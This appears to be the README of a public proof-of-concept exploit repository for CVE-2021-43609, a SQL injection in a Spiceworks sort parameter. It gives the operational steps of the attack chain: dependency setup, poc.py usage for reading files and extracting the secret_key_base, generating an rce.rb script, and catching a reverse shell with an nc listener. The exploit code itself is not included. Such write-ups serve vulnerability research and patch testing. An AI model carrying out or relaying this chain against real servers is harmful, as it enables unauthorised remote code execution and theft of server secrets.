
Proof of Concept Exploit for CVE-2021-43609


d5sec/CVE-2021-43609-POC


Spiceworks Sort SQLi

There's a SQLi in a sort parameter of Spiceworks. The full exploit chain is SQLi -> file read -> RCE.

Demo

[asciicast recording of the exploit demo]

Prerequisites

apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install

Stage 1

Use poc.py to exploit the SQLi -> file read and extract the secret_key_base environment variable. With the values it obtains, poc.py then generates a Ruby PoC script (rce.rb) for gaining a reverse shell.

Usage

usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]

There's a SQLi in a `sort` parameter of Spiceworks. The exploit chain is SQLi -> file read -> RCE.

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         https://example.com
  --lhost LHOST         10.10.10.10
  --lport LPORT         9001
  -u USER, --user USER  [email protected]
  -p PASSWORD, --password PASSWORD
                        P@$$w0rd!
  -e ENV_PATH, --env_path ENV_PATH
                        Path to environment variables

Stage 2

Use rce.rb. Start an nc listener on the IP and port you provided in Stage 1, then simply run:

cd rce && ruby rce.rb

Voila!

Credits
